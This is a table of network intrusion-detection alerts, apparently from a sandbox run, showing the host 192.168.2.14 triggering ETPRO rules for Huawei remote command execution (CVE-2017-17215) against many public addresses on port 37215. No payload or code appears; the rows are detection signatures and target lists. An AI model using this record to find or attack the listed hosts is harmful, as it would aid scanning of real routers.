                                                        06/13/24-21:32:03.307199TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4835837215192.168.2.14197.139.198.159
                                                        06/13/24-21:33:04.990384TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5338637215192.168.2.14156.30.46.178
                                                        06/13/24-21:32:19.753705TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4992437215192.168.2.1441.150.106.6
                                                        06/13/24-21:32:48.570134TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4017837215192.168.2.14197.28.29.63
                                                        06/13/24-21:32:36.243236TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4140637215192.168.2.1441.165.226.201
                                                        06/13/24-21:32:46.526256TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3410037215192.168.2.14156.153.105.72
                                                        06/13/24-21:32:13.546117TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3987237215192.168.2.14197.9.4.241
                                                        06/13/24-21:32:25.970886TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5538037215192.168.2.14156.211.86.198
                                                        06/13/24-21:33:13.213764TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4738037215192.168.2.14156.99.203.50
                                                        06/13/24-21:31:59.175975TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4244637215192.168.2.14197.192.232.136
                                                        06/13/24-21:33:00.871282TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5129837215192.168.2.1441.51.56.108
                                                        06/13/24-21:32:23.935868TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4115237215192.168.2.14197.222.76.213
                                                        06/13/24-21:33:05.012556TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3998837215192.168.2.14156.31.124.182
                                                        06/13/24-21:33:07.057475TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3789237215192.168.2.14156.212.199.93
                                                        06/13/24-21:31:57.131707TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4452037215192.168.2.14197.65.242.5
                                                        06/13/24-21:32:42.407260TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3685237215192.168.2.1441.147.171.180
                                                        06/13/24-21:32:11.487791TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4722437215192.168.2.14156.68.112.16
                                                        06/13/24-21:33:02.937201TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5488037215192.168.2.1441.242.94.36
                                                        06/13/24-21:33:07.041859TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4512237215192.168.2.14197.9.198.214
                                                        06/13/24-21:31:59.174757TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4515837215192.168.2.1441.128.20.245
                                                        06/13/24-21:32:01.224364TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3359437215192.168.2.14156.129.125.8
                                                        06/13/24-21:32:48.571043TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4953237215192.168.2.14197.222.8.62
                                                        06/13/24-21:32:46.501481TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4531637215192.168.2.1441.162.150.179
                                                        06/13/24-21:32:23.835731TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6089037215192.168.2.1441.63.252.23
                                                        06/13/24-21:31:59.177482TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4298037215192.168.2.1441.169.161.144
                                                        06/13/24-21:31:59.196346TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5761637215192.168.2.14156.87.247.69
                                                        06/13/24-21:32:23.834133TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5151237215192.168.2.1441.11.136.68
                                                        06/13/24-21:33:02.914019TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3424237215192.168.2.1441.234.110.195
                                                        06/13/24-21:32:36.262268TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3299037215192.168.2.1441.145.23.159
                                                        06/13/24-21:32:38.316995TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3788237215192.168.2.14156.141.69.22
                                                        06/13/24-21:33:00.870242TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4085637215192.168.2.14156.250.128.252
                                                        06/13/24-21:32:23.830563TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5697037215192.168.2.14156.11.237.188
                                                        06/13/24-21:32:44.476664TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5982237215192.168.2.14156.74.134.140
                                                        06/13/24-21:32:11.486425TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5397837215192.168.2.14156.131.13.19
                                                        06/13/24-21:32:30.099779TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3309237215192.168.2.14197.63.35.89
                                                        06/13/24-21:33:13.228915TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5008037215192.168.2.14156.102.131.0
                                                        06/13/24-21:32:42.403819TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4626637215192.168.2.14197.139.238.54
                                                        06/13/24-21:32:56.784328TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3476437215192.168.2.14197.74.12.159
                                                        06/13/24-21:33:09.111430TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3376437215192.168.2.14156.98.236.240
                                                        06/13/24-21:32:23.835673TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3845837215192.168.2.14156.127.72.145
                                                        06/13/24-21:32:13.544605TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4484037215192.168.2.14156.155.225.209
                                                        06/13/24-21:33:02.936405TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5282237215192.168.2.14197.118.186.101
                                                        06/13/24-21:32:01.224602TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4180237215192.168.2.14156.144.164.44
                                                        06/13/24-21:32:58.822993TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5797837215192.168.2.14197.162.212.96
                                                        06/13/24-21:31:57.137753TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5051437215192.168.2.1441.148.32.215
                                                        06/13/24-21:32:01.224094TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5585637215192.168.2.14156.140.147.35
                                                        06/13/24-21:33:15.253913TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3874237215192.168.2.1441.150.239.171
                                                        06/13/24-21:32:09.458256TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4270637215192.168.2.14197.61.213.203
                                                        06/13/24-21:32:38.302848TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3630037215192.168.2.1441.26.48.235
                                                        06/13/24-21:32:50.614987TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3939637215192.168.2.1441.221.120.14
                                                        06/13/24-21:32:01.240177TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4441237215192.168.2.14156.215.111.69
                                                        06/13/24-21:33:09.128868TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4325037215192.168.2.1441.34.41.128
                                                        06/13/24-21:32:25.969477TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3955637215192.168.2.14197.131.189.131
                                                        06/13/24-21:33:09.089857TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4624237215192.168.2.14156.156.184.248
                                                        06/13/24-21:33:09.108916TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3634637215192.168.2.1441.185.107.109
                                                        06/13/24-21:32:17.677224TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4079237215192.168.2.14197.58.145.40
                                                        06/13/24-21:32:03.308505TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4863637215192.168.2.14156.133.67.92
                                                        06/13/24-21:33:13.213816TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4022237215192.168.2.1441.166.40.228
                                                        06/13/24-21:32:05.346214TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5201237215192.168.2.1441.11.175.229
                                                        06/13/24-21:32:19.750619TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4076037215192.168.2.14156.252.55.84
                                                        06/13/24-21:32:42.408241TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5471837215192.168.2.14197.205.19.120
                                                        06/13/24-21:31:57.154302TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4715837215192.168.2.14197.69.12.126
                                                        06/13/24-21:31:57.130988TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4142237215192.168.2.14197.47.117.170
                                                        06/13/24-21:32:21.782874TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5869237215192.168.2.14156.99.212.59
                                                        06/13/24-21:32:44.456900TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5240237215192.168.2.14197.108.78.212
                                                        06/13/24-21:32:01.248607TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4271437215192.168.2.1441.249.150.45
                                                        06/13/24-21:32:36.264390TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4775037215192.168.2.14156.177.111.157
                                                        06/13/24-21:31:57.093382TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6095437215192.168.2.14197.137.16.96
                                                        06/13/24-21:32:56.755730TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3306637215192.168.2.14156.135.235.197
                                                        06/13/24-21:32:48.572647TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5426837215192.168.2.14156.82.112.99
                                                        06/13/24-21:32:38.322762TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5803437215192.168.2.14197.180.26.76
                                                        06/13/24-21:31:57.091789TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3769637215192.168.2.1441.194.169.6
                                                        06/13/24-21:32:17.702545TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5384037215192.168.2.14197.166.166.74
                                                        06/13/24-21:32:09.436589TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5666037215192.168.2.14197.252.17.38
                                                        06/13/24-21:32:17.696971TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5801837215192.168.2.14197.147.22.14
                                                        06/13/24-21:33:11.172944TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4793237215192.168.2.14197.103.213.173
                                                        06/13/24-21:32:13.544639TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4082237215192.168.2.14197.9.100.236
                                                        06/13/24-21:32:46.504158TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3464237215192.168.2.14197.176.176.161
                                                        06/13/24-21:33:04.993494TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4699037215192.168.2.14156.119.207.12
                                                        06/13/24-21:32:54.727177TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3321837215192.168.2.1441.75.188.163
                                                        06/13/24-21:32:32.149825TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4156637215192.168.2.1441.109.73.51
                                                        06/13/24-21:32:01.221592TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4867437215192.168.2.1441.170.24.175
                                                        06/13/24-21:32:17.697114TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5740637215192.168.2.14156.136.131.93
                                                        06/13/24-21:32:21.801980TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4528637215192.168.2.1441.231.245.254
                                                        06/13/24-21:31:59.194950TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5634037215192.168.2.1441.98.175.117
                                                        06/13/24-21:33:11.181505TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5169037215192.168.2.14156.31.30.200
                                                        06/13/24-21:32:11.484893TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5021237215192.168.2.14197.66.133.63
                                                        06/13/24-21:32:34.213772TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4815837215192.168.2.1441.245.224.173
                                                        06/13/24-21:32:48.554372TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4685637215192.168.2.14197.106.109.58
                                                        06/13/24-21:32:09.439480TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5295437215192.168.2.1441.224.95.126
                                                        06/13/24-21:32:23.945589TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5739637215192.168.2.14156.63.57.187
                                                        06/13/24-21:32:56.757492TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5601037215192.168.2.14156.154.234.60
                                                        06/13/24-21:31:57.131212TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5594837215192.168.2.14156.89.186.115
                                                        06/13/24-21:33:02.913993TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6085237215192.168.2.1441.161.170.158
                                                        06/13/24-21:31:59.174216TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5277237215192.168.2.1441.248.134.251
                                                        06/13/24-21:32:03.275651TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3868237215192.168.2.1441.97.40.48
                                                        06/13/24-21:32:28.048639TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3898837215192.168.2.14156.141.148.235
                                                        06/13/24-21:32:42.407550TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4774637215192.168.2.1441.199.145.105
                                                        06/13/24-21:32:42.424169TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4178237215192.168.2.14197.88.14.95
                                                        06/13/24-21:32:44.476499TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4376837215192.168.2.14197.23.73.86
                                                        06/13/24-21:32:01.223541TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5976837215192.168.2.1441.138.70.247
                                                        06/13/24-21:32:07.417705TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4433837215192.168.2.14156.193.242.239
                                                        06/13/24-21:33:09.087701TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4839837215192.168.2.1441.61.32.99
                                                        06/13/24-21:31:57.135882TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4737237215192.168.2.1441.203.39.0
                                                        06/13/24-21:32:30.098272TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3697437215192.168.2.14197.243.233.193
                                                        06/13/24-21:33:00.886337TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4224237215192.168.2.14197.249.126.39
                                                        06/13/24-21:33:13.231198TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4389437215192.168.2.14197.93.211.207
                                                        06/13/24-21:32:03.307011TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4370837215192.168.2.14197.143.155.0
                                                        06/13/24-21:33:13.212610TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5438437215192.168.2.1441.165.166.99
                                                        06/13/24-21:32:54.727038TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3362237215192.168.2.1441.14.23.59
                                                        06/13/24-21:32:23.831365TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3919837215192.168.2.1441.236.174.3
                                                        06/13/24-21:32:40.353646TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6083637215192.168.2.14156.234.5.218
                                                        06/13/24-21:32:25.968166TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5709837215192.168.2.14156.216.86.115
                                                        06/13/24-21:33:04.992877TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5157037215192.168.2.14156.143.34.123
                                                        06/13/24-21:32:11.486222TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3758437215192.168.2.14156.60.182.93
                                                        06/13/24-21:33:00.871701TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4630637215192.168.2.14156.74.166.147
                                                        06/13/24-21:33:15.271494TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5718837215192.168.2.14156.13.145.155
                                                        06/13/24-21:32:11.489092TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4402437215192.168.2.14197.189.141.16
                                                        06/13/24-21:33:15.258327TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5187237215192.168.2.1441.178.254.182
                                                        06/13/24-21:32:48.569291TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4193837215192.168.2.1441.207.11.67
                                                        06/13/24-21:32:46.525694TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3430637215192.168.2.14156.40.157.120
                                                        06/13/24-21:32:11.488358TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4418437215192.168.2.14156.189.118.203
                                                        06/13/24-21:32:58.839246TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6096437215192.168.2.1441.67.232.44
                                                        06/13/24-21:33:02.953850TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5250237215192.168.2.1441.181.212.218
                                                        06/13/24-21:32:56.754492TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5875437215192.168.2.14156.18.63.40
                                                        06/13/24-21:32:19.731057TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5160037215192.168.2.14156.225.128.232
                                                        06/13/24-21:32:52.677650TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5313437215192.168.2.14156.214.148.104
                                                        06/13/24-21:33:00.885827TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3281037215192.168.2.14156.84.234.156
                                                        06/13/24-21:32:38.300652TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3731437215192.168.2.14197.59.197.95
                                                        06/13/24-21:31:57.092573TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4736637215192.168.2.1441.1.138.117
                                                        06/13/24-21:31:59.174184TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5832837215192.168.2.14197.25.6.232
                                                        06/13/24-21:32:13.543522TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3343237215192.168.2.1441.77.32.93
                                                        06/13/24-21:32:30.100366TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5254437215192.168.2.1441.86.198.29
                                                        06/13/24-21:32:09.438684TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4223437215192.168.2.14197.71.134.134
                                                        06/13/24-21:32:40.373151TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4749037215192.168.2.14197.42.64.88
                                                        06/13/24-21:33:02.938004TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5702837215192.168.2.14197.177.138.170
                                                        06/13/24-21:32:38.302218TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5026237215192.168.2.14156.197.4.43
                                                        06/13/24-21:32:19.749720TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4260837215192.168.2.1441.97.240.92
                                                        06/13/24-21:33:11.156742TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5151037215192.168.2.1441.197.123.124
                                                        06/13/24-21:32:30.076929TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3463437215192.168.2.1441.218.243.188
                                                        06/13/24-21:32:44.450544TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3374037215192.168.2.1441.41.25.247
                                                        06/13/24-21:32:36.264683TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3698437215192.168.2.14156.53.62.234
                                                        06/13/24-21:32:19.754448TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5072237215192.168.2.14197.211.189.248
                                                        06/13/24-21:33:09.108699TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4406037215192.168.2.14156.135.53.28
                                                        06/13/24-21:32:03.305407TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3499437215192.168.2.1441.241.137.195
                                                        06/13/24-21:32:52.658553TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4074237215192.168.2.1441.207.121.151
                                                        06/13/24-21:32:21.785930TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3432437215192.168.2.14197.122.8.34
                                                        06/13/24-21:32:11.506316TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3316637215192.168.2.1441.189.32.20
                                                        06/13/24-21:32:05.348739TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5910037215192.168.2.1441.242.79.125
                                                        06/13/24-21:32:36.245997TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5989637215192.168.2.14156.7.168.195
                                                        06/13/24-21:32:23.936964TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5571437215192.168.2.14197.213.96.141
                                                        06/13/24-21:32:44.451858TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4986037215192.168.2.14197.235.178.116
                                                        06/13/24-21:32:23.833161TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4005037215192.168.2.14197.117.201.45
                                                        06/13/24-21:32:56.759283TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5455237215192.168.2.14197.177.68.191
                                                        06/13/24-21:32:07.403749TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5850837215192.168.2.14197.54.161.244
                                                        06/13/24-21:32:11.487941TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5643237215192.168.2.1441.27.252.212
                                                        06/13/24-21:32:36.243768TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5323437215192.168.2.14156.189.48.213
                                                        06/13/24-21:32:52.676063TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4753637215192.168.2.14197.18.42.170
                                                        06/13/24-21:32:25.992967TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4751237215192.168.2.14197.107.10.138
                                                        06/13/24-21:32:30.079476TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3846837215192.168.2.1441.231.48.15
                                                        06/13/24-21:32:03.279997TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3999837215192.168.2.14156.224.187.4
                                                        06/13/24-21:32:28.028368TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5422637215192.168.2.1441.12.123.199
                                                        06/13/24-21:31:59.197023TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5922237215192.168.2.1441.181.213.184
                                                        06/13/24-21:33:00.870521TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4615037215192.168.2.14156.187.71.202
                                                        06/13/24-21:31:59.175094TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6017437215192.168.2.1441.211.73.143
                                                        06/13/24-21:32:17.677612TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3688237215192.168.2.14156.121.207.148
                                                        06/13/24-21:32:25.975543TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3631837215192.168.2.1441.189.235.45
                                                        06/13/24-21:32:56.790064TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4545237215192.168.2.14156.160.79.150
                                                        06/13/24-21:32:54.710249TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5554437215192.168.2.14197.53.187.62
                                                        06/13/24-21:32:13.564832TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3572037215192.168.2.14156.53.6.103
                                                        06/13/24-21:32:09.457263TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6025437215192.168.2.1441.24.147.245
                                                        06/13/24-21:32:54.726513TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5228037215192.168.2.14156.30.103.147
                                                        06/13/24-21:31:57.130334TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3803037215192.168.2.1441.111.116.8
                                                        06/13/24-21:32:28.028599TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5344837215192.168.2.1441.41.70.203
                                                        06/13/24-21:32:30.074942TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5869237215192.168.2.1441.48.80.253
                                                        06/13/24-21:32:52.669910TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4055637215192.168.2.1441.117.62.203
                                                        06/13/24-21:32:19.754428TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5434837215192.168.2.1441.48.101.234
                                                        06/13/24-21:31:59.200085TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5531237215192.168.2.1441.84.165.58
                                                        06/13/24-21:32:38.298661TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5946437215192.168.2.14156.29.115.231
                                                        06/13/24-21:32:42.419770TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5223237215192.168.2.14156.79.174.71
                                                        06/13/24-21:32:23.836451TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5424437215192.168.2.14156.62.244.156
                                                        06/13/24-21:31:59.200030TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4830237215192.168.2.1441.11.160.248
                                                        06/13/24-21:32:11.488142TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4817237215192.168.2.14197.76.49.85
                                                        06/13/24-21:32:03.294930TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5118437215192.168.2.1441.223.127.19
                                                        06/13/24-21:33:13.230640TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3955037215192.168.2.14156.92.108.205
